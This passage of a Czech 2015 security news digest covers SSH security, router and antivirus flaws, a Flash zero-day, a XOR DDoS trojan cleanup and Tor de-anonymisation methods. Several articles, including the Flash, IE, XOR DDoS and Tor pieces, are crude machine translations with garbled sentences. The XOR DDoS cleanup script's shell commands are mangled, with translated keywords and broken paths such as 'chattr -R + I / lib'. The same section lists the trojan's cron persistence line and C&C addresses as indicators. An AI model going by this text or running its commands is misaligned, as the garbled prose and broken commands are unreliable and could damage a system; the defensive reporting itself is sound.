Chcete-li úvěr Cisco, zdá se, že našel dnešní SSH klíčový problém sami o sobě, před tím, než byl zneužit, takže možná je to znamení lepších časů přijít, a důkazy o tom, že po všech těch letech, někdo na Cisco má vlastně začal systematicky auditovat celý svůj kód základny na přítomnost výchozích pověření. Nebo to možná bylo jen štěstí najít, a "hvězdný" 10 roků traťový rekord z výchozích bezpečnostních pověření bulletiny bude pokračovat na další desetiletí? Čas ukáže ...


Je Windows XP stále kolem ve vaší síti rok po Support Ukončeno?

29.6.2015 Zranitelnosti
Tento týden Computerworld [ 1 ] zveřejnila příběh o americkém námořnictvu stále platí miliony Microsoft podporovat Windows XP, když podpora skončila 08.4.2014 [ 2 ], a brzy se systémem Windows Server 2003 budou následovat příští měsíc 14.července 2015.

Pokud platíte společnosti Microsoft i nadále používat zastaralé systémy, jako WinXP, to je zřejmé, že budete muset zaplatit podporu, aby se opravy a pokračovat v ochraně vy sítě proti zranitelnosti, které jsou již veřejně uvolňují na obranu proti potenciálním ohrožení. To přináší cyklus modernizace vlastních aplikací používaných k podpoře kritického systému, které byly napsané na starší platformě a měly by byly součástí programu modernizace, testovací a modernizaci včas, aby zachránit milionů na podporu, které si myslím, že nakonec by měl šetřit peníze. Jako příklad, je námořnictvo platí "[...] smlouvu, která by mohla být v hodnotě až 30.800.000 dolarů, a rozšířit do roku 2017." [ 1 ]

Jste stále podporuje WinXP, protože starší aplikace a je zde plán na jejich migraci přes Win7 / Win8? Pokud ne, jak se chránit tyto klienty proti vykořisťování?

[1]
https://www.microsoft.com/en-in/windows/enterprise/end-of-support.aspx


Antivirové programy otevíraly útočníkům zadní vrátka do PC

29.6.2015 Zranitelnosti
Snad každý uživatel počítače ví, že antivirové programy jsou první obrannou linií před nejrůznějšími viry a dalšími nezvanými návštěvníky. Jenže i tito ochránci mohou stejně jako každý jiný software obsahovat chyby. Minulý týden byla jedna taková objevena v antivirových programech společnosti ESET, útočníkům otevíraly zadní vrátka do PC.
Chyba umožňuje vzdálenému útočníkovi číst, měnit nebo mazat všechny soubory v systému.
Před chybou v softwarových nástrojích společnosti ESET varovalo Národní centrum kybernetické bezpečnosti. „Tato chyba umožňuje vzdálenému útočníkovi číst, měnit nebo mazat všechny soubory v systému bez ohledu na přístupová práva,“ uvedli zástupci centra.

„Dále umožňuje instalovat jakékoliv programy, přistupovat k hardwaru, jako je například webkamera, mikrofon nebo skener a zaznamenávat jakoukoliv systémovou aktivitu včetně stisku kláves či síťového provozu,“ konstatovali bezpečnostní experti.

Trhlina byla odhalena v aplikacích Smart Security, NOD32 Antivirus, ale například také v utilitě Cyber Security. Tyto nástroje byly zneužitelné i v případě, že uživatel nijak neměnil jejich nastavení a nechal je v defaultním režimu.

Pro všechny dotčené aplikace, ve kterých byla chyba objevena, již společnost ESET vydala minulý týden aktualizaci. S její instalací by tak uživatelé neměli otálet.

Postižené systémy
ESET Smart Security pro OS Windows
ESET NOD32 Antivirus pro OS Windows
ESET Cyber Security Pro pro OS X
ESET NOD32 pro Linux Desktop
ESET Endpoint Security pro OS Windows and OS X
ESET NOD32 Business Edition
Zdroj: Národní centrum kybernetické bezpečnosti


Útoky na SSH: je ještě bezpečné?

27.6.2015 Počítačový útok

V posledních měsících je zvykem bezpečnostní chyby ohlašovat s velkou pompou, vytvářet pro ně vlastní web a v ideálním případě i logo. Uživatelé jsou takto průběžně masírovaní tím, kolik chyb je v protokolech nebo jejich implementacích. Otázkou ale je, zda a jak moc je stále bezpečné třeba SSH.

SSH je velmi rozšířeným protokolem nejen pro dálkovou správu unixových serverů, ale také pro přenos souborů, přesměrování portů a další úkony. V poslední době ale přibylo oznámení nejrůznějších bezpečnostních chyb, které ohrožují šifrovací algoritmy a hrozí únikem dat. Svůj podíl na tom mají i tajné služby, jejichž aktivita v tomto odvětví donutila uživatele klást si otázku: Je tohle vlastně ještě bezpečné?

Historický základ

Kořeny SSH sahají až do roku 1995, kdy na Helsinki University of Technology vyvinul Tatu Ylönen první implementaci nového protokolu, který měl za úkol zabránit odposlechu hesel na univerzitní síti. Autor se později rozhodl svůj software prodávat, a proto po čtyřech letech kód uzavřel a změnil jeho licenci. V tu chvíli se poslední otevřené verze chopili vývojáři projektu OpenBSD, kteří pokračovali ve vývoji otevřené verze. V tu chvíli začalo také masivní šíření software na mnoho různých platforem včetně linuxových a unixových operačních systémů.

V roce 2008 už mělo OpenSSH na internetu více než 80% podíl. V současné době je aktuální verze 6.8 a další je už ve fázi testování. SSH nahrazuje starší protokoly jako telnet, rlogin, rsh, rcp a ftp. Předpokládám, že jste o nich slyšeli a doufám, že žádný z nich už nepoužíváte, řekl ve své přednášce na konferenci CryptoFest Jakub Jelen ze společnosti Red Hat a spolku vpsFree.cz. SSH umožňuje autentizaci bez hesla, ověření protistrany pomocí otisku klíčů, přesměrování portu nebo třeba přenos X11 sezení bezpečným kanálem. Zásadní také je, že SSH dnes není závislé na konkrétním hashovacím algoritmu, algoritmu výměny klíče nebo šifře. V průběhu let byla část algoritmů označena za problémovou – například byla používaná šifra Blowfish, 3DES, RC4, IDEA nebo tehdy patentovaná RSA. Nebyly dobré, ale tehdy to bylo to nejlepší, co bylo k dispozici.

OpenSSH
OpenSSH už pohřbilo řadu protokolů
Existují dvě verze protokolu označované jako SSH1 a SSH2. Původní protokol SSH1 je dnes považován za zastaralý a nebezpečný, což plyne také z toho, že byl vymyšlen v roce 1995 jedním člověkem. Když vymýšlíte něco na zelené louce, je nepravděpodobné, že to bude napoprvé správně. Proto se v průběhu let objevilo několik různých zranitelností – nedostatečně kontrolovaná integrita dat, modifikace posledního bloku šifry IDEA a možnost MitM útoku. Dnes se s ním naštěstí člověk už nepotká, většina serverů a klientů je má zakázané. Problém je jen ve vestavěných systémech, které jej ještě někdy používají.

Od roku 2006 existuje SSH2, které je zpětně nekompatibilní, ale významně vylepšuje bezpečnost. Z dokumentů, které vynesl Snowden, je zřejmé, že NSA dokáže dekódovat ‚některá SSH spojení‘. Bohužel není zřejmé, co přesně a za jakých okolností je možné odposlouchávat. Opět to ale důvod zabývat se celou bezpečností SSH, jak z pohledu algoritmů, tak jejich implementace v OpenSSH.

Známé vektory útoků

Pro bezpečnost SSH je zásadní bezpečnost výměny šifrovacích klíčů metodou Diffie-Hellman. Ta umožňuje předat protistraně informaci tak, že informace samotná zabezpečeným kanálem vůbec neputuje. Putují jen dílčí informace, které jsou ale bez znalosti nepřenášené části bezcenné. Pokud by v budoucnu někdo získal od jedné strany privátní klíč, stejně by nebyl schopen celou komunikaci dešifrovat. Ta je totiž zabezpečena jednorázovým symetrickým klíčem, který nelze vyčíst ani po dešifrování začátku komunikace.

OpenSSH
Princip Diffie-Hellman: Alice a Bob si vymění barvy už smíchané, výsledkem je hnědá, která ale v komunikaci nefigurovala a je velmi obtížné ji odvodit.

Velmi známým útokem je takzvaný Logjam, který neútočí přímo na SSH, ale právě na výměnu klíčů pomocí Diffie-Hellman. Ta se netýká jen SSH, ale obecně TLS – potenciálně ohroženy jsou tedy i další protokoly jako HTTPS nebo VPN. Algoritmus výměny totiž předpokládá, že se na vstupu používají dostatečně velká prvočísla, která se navíc příliš často neopakují. Praxe je ale bohužel jiná. Ukázalo se, že na celém internetu se používá jen několik málo prvočísel a většina použitých čísel má velmi malou délku. Přibližně v 90 % případů se používá asi jen pět prvočísel, která jsou navíc poměrně malá (512 bitů). Pří útoku Logjam je možné přimět server používat právě tato malá prvočísla – takzvaný downgrade attack. Servery tuto možnost stále obsahují kvůli zpětné kompatibilitě.

Většina běžně používaných aplikací navíc používá stále stejný seznam předgenerovaných čísel, který je k dispozici už od devadesátých let. Konkrétně v OpenSSH je připraveno třicet prvočísel, která mají délku 1024 bitů, a pak také další s větší délkou. Problém totiž spočívá v pravděpodobnostních testech, které dovolují ověřit, zda je vygenerovaná hodnota prvočíslem. Tyto testy jsou velmi náročné a pro uživatele by bylo velmi nepraktické generovat si tímto způsobem vlastní sadu prvočísel.

Běžná faktorizace prvočísel je velmi náročný úkol, ale pokud bereme v potaz jen velmi malé množství prvočísel, můžeme provést jejich předzpracování. Pro 512 bitů to na milionu procesorových jader trvá přibližně týden. Samotné dešifrování spojení pak proběhne do jedné minuty. Je docela možné, že NSA takový výkon k dispozici má. Současná verze OpenSSH odebrala prvočísla s délkou 1024 bitů, takže už není možné se se serverem dohodnout na jejich použití. Pomůže také samozřejmě zakázání starších protokolů a slabších šifrovacích algoritmů. Při délce 1024 bitů se nám doba předzpracování na milionu jader protáhne na 35 milionů let, dodává Jelen.

Bezpečnost SSH závisí také na dalších komponentách systému, jako je například Bash nebo standardní knihovna C. Na ně byly před časem předvedeny útoky jako ShellShock ze září 2014, POODLE z října 2014 a GHOST z ledna 2015. Pomocí nich je možné spouštět příkazy přes proměnné prostředí nebo dešifrovat zasílané zprávy. Naštěstí bylo možné tyto chyby poměrně rychle opravit, záleží však na správcích serverů a uživatelích, zda záplatují.

Kromě technických chyb jsou tu ale i problémy s lidským faktorem, který tu s námi je a vždy bude. Nejzajímavější jsou chyby vznikající mezi počítačem a židlí. Zmíněna byla například úprava SSH v Debianu, která poškozovala generátor klíčů, takže bylo možné vygenerovat jen asi 100 000 různých klíčů. Další problémy souvisí s tím, že uživatelé rádi ukládají své domovské adresáře na GitHub včetně souborů s privátními klíči. Stačilo tak použít vyhledávání a získali jste stovky privátních klíčů.

Jak se bránit?

Bránit je možné se ve třech různých oblastech: auditem kódu, úpravou programu v závislosti na současných trendech a implementací. V roce 2002 zavedlo OpenSSH privilege separation a sandboxing což jsou bezpečnostní postupy schopné zabránit předautentizačním útokům. Zneužívá se toho, že SSH server běží s právy roota, takže je ho možné teoreticky napadnout a získat v systému nejvyšší práva. Po zavedení zmíněných úprav už uživatel po síti komunikuje s neprivilegovaným procesem v sandboxu, který pak s SSHd komunikuje přes definované API. Vše ostatní má zakázáno, takže prakticky není možné jej zneužít k připojení do systému bez autentizace. Proces běží v prázdném chrootu, je obvykle přísně omezen limity a ještě často chráněn SELinuxem.

Z uživatelského hlediska je možné použít například fail2ban, který automaticky blokuje IP adresy, ze kterých přichází příliš mnoho požadavků na přihlášení. Na můj server se denně pokusí někdo připojit přibližně třistakrát. Dále je možné službu zcela utajit a zavřít pomocí firewallu. Poté je možné se autorizovat pomocí port knockingu či jednoho podepsaného UDP paketu, který pak otevře přednastaveným IP adresám patřičný přístupový port – využít je možné například program Fwknop. Má klienty pro všechny možné platformy včetně mobilních, takže si do mobilu nahrajete klíč a poté si můžete otevírat porty na serveru. Výhodou je, že útočník vůbec nevidí otevřený port SSH a není schopen na něj ani začít útočit.

skoleni

Důležité také je, aby uživatelé poctivě kontrolovali otisky veřejných klíčů u prvních spojení s novými servery. Eliminujeme tím riziko man-in-the-middle útoku, kdy by se útočník mohl vydávat za cizí server. Výhodou je, že klíč je nutné kontrolovat jen jednou, poté si jej klient zapamatuje a sám provádí další ověřování.

Podle Jakuba Jelena je SSH stále bezpečné, ale bezpečnost závisí na konkrétní implementaci. Největší slabina je stále v útoku hrubou silou. Dejte si pozor zejména na hesla. I když používáte přihlašování klíčem, pokud explicitně nezakážete přihlašování heslem, je stále možné hesla hádat a přes slabá se do systému přihlásit, uzavřel svou přednášku.


Pozor na routery Asus. CZ.NIC v nich našel chybu, která „otevře dveře“

26.6.2015 Zranitelnsti

Před měsícem zveřejnili autoři projektu Turris zprávu o tom, že se jim díky novým sledovacím funkcím podařilo odhalit aktivní botnet využívající routery. Pokračovali ve sledování a připravili také návnadu, která odhalila závažnou bezpečnostní chybu v domácím routeru od Asusu. Informace autoři zveřejnili na blogu CZ.NIC.

Před měsícem bylo sledování ještě na začátku a bezpečnostní experti z CZ.NIC napočítali zatím jen necelé dvě stovky IP adres napadených routerů. Nyní už jich je 13 tisíc. Je překvapivé, že 70% z nich jsou routery značky Asus. A tak v CZ.NIC jeden takový router zakoupili a pustili se do zkoumání, v čem by mohl být problém.

590415613
Pokusným routerem se stal Asus RT-N10U hardwarové revize B1. Levný domácí router, který je jedním z nejčastější zjištěných prvků botnetu. Bylo u něj zkontrolováno, zda má poslední verzi firmwaru, nastaveno silné heslo do administrace a nebyl aktivovaný firewall. Zkrátka běžné provozní podmínky. Takto připravený router byl „vystaven na internet“ a skrze Turris byl zaznamenáván síťový provoz.

Dva týdny probíhaly běžné útoky s nejčastějšími kombinacemi hesel, ale ty byly pochopitelně neúspěšné. Jaké pak ale přišlo překvapení, když se kdosi s bulharskou IP adresou do routeru přihlásil se správným heslem. Přitom předtím nebyly zaznamenány žádné pokusy o násilné hádání hesla, které přitom bylo značně unikátní. Bližší zkoumání odhalilo, že heslo předtím router odeslal v nezašifrované podobě, bylo součástí javascriptového kódu hlášky odezvy na chybnou stránku.

Jak bylo dále zjištěno, tato velká bezpečnostní chyba byla diskutována už v únoru 2014 a Asus pro ni připravil aktualizace firmwarů. Ale zřejmě jen u některých modelů. V testovaném modelu RT-N10U vestavěný nástroj pro kontrolu aktualizací hlásil, že novější neexistuje, ovšem novější firmware i pro tento model kupodivu existuje. Jen ho musíte vyhledat a stáhnout ručně.

Pokud používáte nějaký router od Asusu, preventivně si ověřte, zda máte poslední firmware a případně jej aktualizujte. Přitom router zresetujte a změňte mu heslo. Nutno ale připomenout, že v botnetu byly zjištěny i další routery a podobných bezpečnostních děr bude existovat více. Jsou to otevřená vrata do soukromí nic netušících uživatelů. Podrobnosti najdete na blogu CZ.NIC.


Na počítačích Samsung nefungují updaty Windows, uživatelé v ohrožení

26.6.2015 Hrozby
Na svých desktopech a noteboocích Samsung vypíná službu Windows Update, díky čemuž jsou uživatelé těchto zařízení ohroženi i těmi bezpečnostními riziky, na něž již byly vydané aktualizace.

Microsoft vypnutí Windows Update na počítačích Samsungu potvrdil s tím, že o celé věci s korejskou společností jedná. Jak dodal mluvčí Microsoftu, americký gigant „vypnutí či úpravu nastavení Windows Update obecně nedoporučuje, jelikož uživatele vystavuje vyššímu bezpečnostnímu riziku.“

Na problém jako první přišel IT expert Patrick Barker, podle kterého způsobuje vypnutí Windows Update systém Samsungu, který se stará o aktualizace jeho vlastního softwaru.

Jak uvedl Barker v úterý na svém blogu, balíček SW Update předinstalovaný na počítačích Samsungu obsahuje soubor Diable_Windowsupdate.exe, který dělá přesně to, co byste dle jeho názvu očekávali: blokuje spuštění aplikace Windowsupdate.exe.
 

Disable_Windowsupdate.exe je podepsán vlastním digitálním certifikátem Samsungu a lze jej nainstalovat na všechny verze Windows od XP až po nejnovější Windows 10.

Podle expertů zatím není jasné to, zda SW Update uživatelům stahuje z Windows Update alespoň některé aktualizace, či zda jsou po vypnutí Windows Update zcela ponecháni napospas hackerům.

Jak vedl viceprezident konzultantské společnosti New Context Andrew Storms, je také možné, že Samsung pomocí svého aktualizačního mechanismu uživatelům distribuuje „své vlastní verze patchů.“ I tento přístup by však byl velmi nestandardní. Samsung se k celé věci zatím nevyjádřil.


Flash Player 0-day využívány ve volné přírodě, náplast ihned!
24.6.2015 Zranitelnosti
Společnost Adobe vydala nouzovou opravu pro své notoricky buggy software Flash Player, protože útočníci jsou aktivně využívají kritické zranitelnosti, které může vést k celkovému systému kompromisu. "Adobe si je vědom zpráv, které CVE-2015-3113 je aktivně využívaných v divočině přes omezený , cílené útoky. Systems spuštěna aplikace Internet Explorer pro Windows 7 a níže, stejně jako Firefox v systému Windows XP, jsou známé cíle, "společnost sdílené v bulletinu zabezpečení zveřejněné v úterý. zranitelnost byla hlášena Adobe výzkumníky FireEye, kdo všiml je využívána v červnu v phishing kampani. E-maily zahrnuty odkazy na napadených webových serverů, které sloužily buď benigní obsah nebo škodlivý soubor Adobe Flash Player, který zneužívá chybu. (velmi obecný) phishingu kampaň zjevně zaměřena na organizace v letectví a obrany, stavebnictví a strojírenství, high-tech, telekomunikační a dopravním průmyslu. "útok zneužívá unpatched chyba zabezpečení ve způsobu, jakým Adobe Flash Player analyzuje soubory flash video (FLV). exploit využívá společný vektorových techniky korupce, aby se vyhnula Address Space Layout R (ASLR), a používá Return-orientované programování (ROP), aby se vyhnula Data Execution Prevention (DEP). pěkný trik, aby jejich ROP technikou dělá to jednodušší využít a bude vyhnout se některé detekční ROP techniky, "výzkumníci FireEye vysvětloval . "Shell kód je uložen v balené Adobe Flash Player využívat souboru spolu klíč používaný k jeho dešifrování. Užitečné zatížení je XOR zakódovány a skrytý uvnitř obrazu. " Vědci se domnívají, že skupina hrozeb oni říkali APT3 (aka UPS) je za útokem. Považováno za velmi sofistikované, tato skupina prohlížeč založený na zero-day využije několikrát předtím. Jsou to obvykle po pověření, a usilují o dosažení přetrvávání v síti cílových organizací instalací vlastní zadní vrátka na mnoho hostitelů v něm. Windows, OS X a uživatelé Linuxu se doporučuje, aby aktualizovali své produktové instalace na nejnovější verzi. Můžete zkontrolovat, kterou verzi používáte podle vising této stránky . Adobe Flash Player nainstalován s Google Chrome a Internet Explorer v systému Windows 8.x bude automaticky aktualizovat na nejnovější verzi.


Zprávy HP zneužitelného kódu pro IE zero-day, že Microsoft nebude oprava
24.6.2015 Zranitelnosti
Navzdory tomu, že zaplatil 125.000 dolar informace o adresní prostor rozložení randomizace (ASLR) zranitelnosti ovlivňuje Internet Explorer, Microsoft se rozhodl proti záplatování, protože se domnívají, že nemá vliv na výchozí konfiguraci IE. Ale výzkumníci z iniciativy HP Zero Day, kteří objevili to zero-day chyba v první řadě věří, že "se týkaly uživatelé by měli být jako plně informován, jak je to možné, aby se bez ohledu na opatření, zjistí, vhodné pro jejich vlastní zařízení." To je důvod, proč publikoval důkaz-of-concept (PoC) kód demonstrovat tento obchvat na Windows 7 a Windows 8.1, a podrobnosti o výzkumu a technické podrobnosti útoků, spolu s tipy, jak zlepšit obranu prohlížeče.

"Uvolnění tuto úroveň detailů o Nepřipevněné chyba není něco, co bychom normálně dělat, ani budeme dělat to na lehkou váhu. Chcete-li být velmi jasné, neděláme to ze zášti či zlomyslnosti," HP Dustin Childs vysvětlil . "Nicméně, protože Microsoft potvrzuje, že se v korespondenci s námi nemají v úmyslu přijmout opatření z tohoto výzkumu, jsme cítili potřebu poskytovat tyto informace veřejnosti. Činíme tak v souladu s podmínkami naší vlastní ZDI programu zranitelnost utajení. " Dodal také, že toto není první prodejce se rozhodla, že nebude opravit problém si myslí, že by měli, a to jistě nebude naposledy. Bohužel, vydala informace, je pravděpodobné, že přijde vhod pro využívání Developers Kit.


XOR DDOS Zmírňování a analýza

23.6.2015 Počítačový útok
XOR DDOS Trojan Trouble

Jsem bojoval za posledních posledních měsících s klienty prostředí nákazy a opakovaně napaden s XOR DDOS trojan. Narušení a reinfekcí sazby byly drahé občas. Klient v pochybnost je malá firma s omezenými zdroji. Vzhledem k tomu, že systém by si opakovaně napaden, návnadou systém byl nakonec dát na místo pro stanovení příchozí vektor. To nebylo prokázáno, ale věřil, že ssh hrubá síla byla příchozí vektor útoku. Jakmile útočník však na server, byla použita souprava kořenový trojský. Velmi inteligentní jeden. Velmi doporučuji, že někdo, že dostane chytili tento trojan, nebo jeden jako to přeinstalaci operačního systému co nejdříve, a vykonávat mé prevence kroky uvedeny níže. Nicméně, tam jsou některé okolnosti, které vyžadují zmírňování před dostupné zdroje můžete využít k přeinstalovat / výměnu a preventivní opatření. Klient se v situaci, kdy při systému offline, nebyla možnost bezprostřední. Umístil jsem některé opravdu skvělé spojení níže. [1] [2] [3] Oni recenze, analyzovat a plně potvrzují to, co jsme se setkali byl stejný. Tam byly některé drobné rozdíly. Nicméně, oni nikdy skutečně nabídli krátkou cestu termín zmírnění následovat. Jen někde v komentáři k fóru (případně jeden ze tří předmětů níže), to někdo něco navrhnout, aby změnit soubor / atributy adresář pomáhat při zmírňování. Byl to jen návrh bez dalšího sledování. Zmírnění tohoto trojan bylo obtížné, protože to bylo dost inteligentní, aby se vždy znovu, když to byl zabit, který zahrnoval pomoc od zápisů crontab každé tři minuty. Bylo také pozorováno spustitelný někdy byla skryta velmi dobře v tabulce procesu.

Základní MO
Oběť Server byl CentOS 6.5 systém se základní nastavení LAMP, který nabídl ssh a VSFTP služby. Iptables byl v použití, ale ne SELinux. Je to můj nevyzkoušený tvrzení, že SELinux pravděpodobně by zabránila této Trojan z zabydluje. Nejsem SELinux uživatel / expert, takže jsem byl schopen vzít čas a přidejte ji do tohoto prostředí. Původní malware byl objeven v /lib/libgcc4.so . Tento exe byl udržován pomocí cronu v / etc / crontab každé tři minuty. (* / 3 * * * * kořen /etc/cron.hourly/udev.sh) Pokud crontab dostane vyčištěna a spustitelný soubor je stále běží, pak crontab bude být repopulated v pátek večer kolem půlnoci. (Pamatujte, že někdy exe byla skryta dobře a byl přehlédnut) malware vytváří náhodný řetězec spouštěcí skripty a umístí je do /etc/init.d/* . Jediné, co potřebujete k provedení LS -lrt /etc/init.d/* objevit nějaký důkaz. Spolu s použitím horního nástroje, lze určit, kolik jsou spuštěny. V případě, že začínajícím jsou odstraněny, pak se vytvoří další spustitelné soubory a startovací skripty a začíná běžet také. Malware sám byl používán jako DDOS činidlo. Trvalo příkazy z C & C. IP adresy, že by komunikovat s byly k dispozici od strun výstupu spustitelného souboru. Když byl malware činidlo povoláni do akce, celý server a místní potrubí byl nasycen a následně odříznut od služby.

Zmírnění
Byla přijata následující kroky pro zmírnění. Jediná věc, která zabránila znovuvytvoření malwaru bylo použití chattr příkazu. Přidání neměnnou bit do /etc/init.d a / lib adresářů byly užitečné při prevenci malware z repopulating. Dal jsem dohromady následující scénář pro smyčky a dodal následující IP adresy IP tabulky klesnout veškerou komunikaci. Cyklus for se skládá z vyčištění čtyř běžících procesů. Použil jsem ls a top určit pro smyčky argumenty a PID je používaných v kill příkazu. I přes následující do skript s názvem runit.sh a popraven to. U smyčky: pro f v zyjuzaaame lcmowpgenr belmyowxlc aqewcdyppt dělat mv /etc/init.d/$f / tmp / DDoS / rm -f /etc/cron.hourly /udev.sh rm -f /var/run/udev.pid mv /lib/libgcc4.so /tmp/ddos/libgcc4.so.$f chattr -R + I / lib chattr -R + i / etc / init. d kill -9 19.897 19.890 19.888 19.891 udělal IP adresy k poklesu veškerý provoz: 103.25.9.228 103.25.9.229

Prevence
I teď udržet neměnnou bit nastavený na / lib na čistý systém. To jej vypnout před záplatování a software nainstaluje, v případě, / lib adresář je potřebné pro aktualizaci. Také jsem doporučujeme nainstalovat fail2ban a konfiguraci jej sledovat mnoho vašich služeb. Mám to v současné době sledování Apache logů, ssh, vsftp, webmail, atd. Je to opravdu vypadá, že bude bít značku pro prevenci. Tam je whitelist funkce ignorovat provoz z dané IP nebo rozsahu IP adres. To pomáhá udržet nepříjemné zákazníci od stávat kobylka. Pokud jste zažili něco podobného výše, pak neváhejte se podělit. Tato analýza je pouze poškrábání povrchu.


Samsung u telefonů Galaxy opraví závažnou bezpečnostní díru

23.6.2015 Mobil

Korejská společnost Samsung vydá patche na kritickou bezpečnostní díru, která se nachází ve všech smartphonech řady Galaxy.

Samsung tak reaguje na vyjádření společnosti NowSecure, která objevila závažnou hrozbu v aplikaci SwiftKey. Tato aplikace je předinstalována na všech chytrých mobilních telefonech řady Samsung Galaxy a podle expertů z NowSecure ji mohou hackeři na dálku zneužívat i tehdy, pokud daný uživatel SwiftKey vůbec nepoužívá.

Mluvčí Samsungu nyní k celé věci uvedl, že jeho inženýři během následujících několika dnů zpřístupní aktualizace pro smartphone Galaxy S4 (vydaný v roce 2013) a novější modely. Tato zařízení mají nainstalována bezpečnostní platformu Samsung Knox, a mohou být aktualizována přímo vzduchem. Uživatelé však musejí mít ve svých telefonech zapnuté automatické aktualizace.
 

Pro ty uživatele, kteří nemají telefony s platformou Knox, Samsung připravuje rozsáhlejší aktualizaci firmwaru. Její dostupnost však bude záviset na modelu smartphonu, regionu a operátorovi.

Aplikace SwiftKey automaticky doplňuje slova, která uživatel píše na klávesnici. Software je možné si stáhnout i z Google Play a Apple App Store, přičemž tyto verze aplikace podle mluvčího SwiftKey žádné bezpečnostní riziko neobsahují.


Avira nabízí kombinaci antiviru a VPN pro bezpečné připojení ve veřejné Wi-Fi

22.6.2015 Software
Nový produktový balíček, který nabízí ochranu proti malwaru a jenž je doplněný o komponentu pro šifrované surfování ve veřejných sítích Wi-Fi, uvedla na trh Avira.

Součástí novinky je program Avira Antivirus Pro doplněný o služba Encrypted VPN od společnosti Private WiFi.

Ta umožňuje prostřednictvím soukromé sítě VPN (Virtual Private Network) automaticky šifrovat data uživatelů přenášená v jakékoli síti Wi-Fi.

Šifrovaná síť VPN podle dodavatele zabrání hackerům v zachycení soukromých dat z uživatelských zařízení, ať už tito útočníci používají jakékoli metody, například pirátské přístupové body k Wi-Fi, útoky typu man-in-the-middle nebo software vyhledávající nechráněná místa sítě.

Nový produkt Aviry je již v prodeji , dostupný je v angličtině a němčině.


Odhalení uživatelům Tor: kde anonymita končí v darknet
20.6.2015 Bezpečnost

CYBER ​​ŠPIONÁŽ JAVASCRIPT ONION TOR
Na rozdíl od běžných World Wide Web technologie, se cibule směrovacích technologie Tor darknet poskytují uživatelům reálnou šanci zůstat v anonymitě. Mnoho uživatelů si skočil na tomto šanci - takže někteří dělali, aby se ochránili nebo ze zvědavosti, zatímco jiní vyvinuli falešný pocit beztrestnosti, a viděl příležitost udělat tajné podnikat anonymně: prodej zakázaného zboží, distribuci nelegálního obsahu, atd. Nicméně, další vývoj, jako je například zadržení tvůrce webu Silk Road, přesvědčivě prokázala, že tyto podniky byly méně anonymní než většina předpokládal.

Zpravodajské služby nebyly zveřejněny žádné technické podrobnosti o tom, jak oni zadrželi zločinci, kteří vytvořili Tor stránky k distribuci nelegálního zboží; zejména proto, že neposkytují žádné vodítko, jak se identifikují zločinci, kteří se chovají anonymně. To může znamenat, že realizace Tor darknet obsahuje některé slabiny a / nebo konfigurační vady, které umožňují odhalit každý uživatel Tor. V tomto výzkumu, budeme prezentovat praktické příklady ukazují, jak mohou uživatelé Tor ztratí svou anonymitu a bude čerpat z těchto příkladů závěry.

Jak jsou uživatelé Tor přišpendlený dolů?

Historie Tor darknet viděl mnoho pokusů - teoretické a praktické - identifikovat anonymní uživatelé. Všechny z nich mohou být podmíněně rozdělit do dvou skupin: útoky na straně klienta (prohlížeče), a útoky na spojení.

Problémy ve webových prohlížečích

Tyto dokumenty unikly NSA nám říkají, že zpravodajské služby nemají žádné výčitky pomocí exploitů na Firefox, což bylo základem pro Tor Browser. Nicméně, jak NSA vykazuje ve své prezentaci, používat k využívání zranitelnosti nástrojů neumožňuje trvalý dohled nad uživateli darknet. Využije mají velmi krátkou životnost, takže v určitém okamžiku času existují různé verze prohlížeče, z nichž některé obsahující konkrétní zranitelnost a jiné ne. To umožňuje dohled nad jen ve velmi úzkém spektru uživatelů.

Odhalení uživatelům Tor: kde anonymita končí v darknet

Unikly NSA dokumenty, včetně přehledu o tom, jak uživatelé Tor může být de-anonymizovány (Zdroj: www.theguardian.com )

Stejně jako tyto pseudo-oficiální dokumenty, Tor komunita je rovněž vědoma dalších zajímavých a naivní útoky na straně klienta. Například, vědci z Massachusetts Institute of Technology založena , že Flash vytvoří vyhrazený komunikační kanál pro zvláštní serveru cybercriminal, která zachycuje skutečné IP adresy klienta, a naprosto diskredituje oběť. Nicméně, vývojáři Tor Browser je pohotově reagovala na tento problém vyloučením Flash manipulátory obsahu z jejich produktu.

Odhalení uživatelům Tor: kde anonymita končí v darknet

Odhalení uživatelům Tor: kde anonymita končí v darknet

Flash jako způsob, jak zjistit skutečnou IP adresu oběti (Zdroj: http://web.mit.edu )

Další, tentokrát moderní způsob ohrožení webového prohlížeče je realizováno pomocí WebRTC DLL. Tato knihovna je navržena tak, aby uspořádat přenosový video stream kanál podporující HTML5, a, podobně jako kanál Flash je popsáno výše, je používán k tomu, aby skutečné IP adresy oběti, které mají být stanoveny. Takzvané požádá STUN WebRTC jsou zaslány ve formátu prostého textu, a tak obcházet Tor a všemi nevyhnutelnými důsledky. Nicméně, tento "nedostatek" byl také okamžitě opraveno Tor vývojáři prohlížeče, takže teď bloky prohlížeče WebRTC ve výchozím nastavení.

Útoky na komunikační kanál

Na rozdíl od útoků prohlížeče, útoky na kanálu mezi klientem a serverem Tor nacházející se uvnitř nebo vně darknet zdají nepřesvědčivé. Zatím většina konceptů byly výzkumníky prezentovány v laboratorních podmínkách a žádné "in-the-pole" důkazy konceptu zatím nebyly předloženy.

Mezi těmito teoretických pracích, jeden zásadní textu si zaslouží zvláštní zmínku - je založen na analýze provozu využívající protokol NetFlow. Autoři tohoto výzkumu, se domnívají, že útočník strana je schopen analyzovat NetFlow záznamy, směrovače, které jsou přímými uzly Tor nebo jsou umístěny v jejich blízkosti. NetFlow záznam obsahuje následující informace:

Číslo verze protokolu;
Číslo záznamu;
Příchozí a odchozí síťové rozhraní;
Čas toku hlavy a proud koncem;
Počet bajtů a paketů v toku;
Adresa zdroje a určení;
Port zdroje a určení;
Číslo protokolu IP;
Hodnota druh dopravy;
Všechny vlajky pozorované během TCP spojení;
Gatway adresa;
Masky zdrojové a cílové podsítí.
Z praktického hlediska všech těchto identifikaci klienta.

Odhalení uživatelům Tor: kde anonymita končí v darknet

Odhalení uživatelům Tor: kde anonymita končí v darknet

De-anonymity klienta Tor na základě analýzy provozu
(Zdroj: https://mice.cs.columbia.edu )

Tento druh analýzy založené na vyšetřování provozu vyžaduje obrovské množství přípojných bodů uvnitř Tor, v případě, že útočník chce, aby bylo možné k de-anonymitu každému uživateli v každém časovém období. Z tohoto důvodu se tyto studie nemají žádný praktický význam pro jednotlivé výzkumníky, pokud mají obrovský bazén výpočetních zdrojů. Také z tohoto důvodu budeme mít jiný směr, a zváží další praktické metody analýzy aktivita a Tor uživatele.

Pasivní monitorovací systém

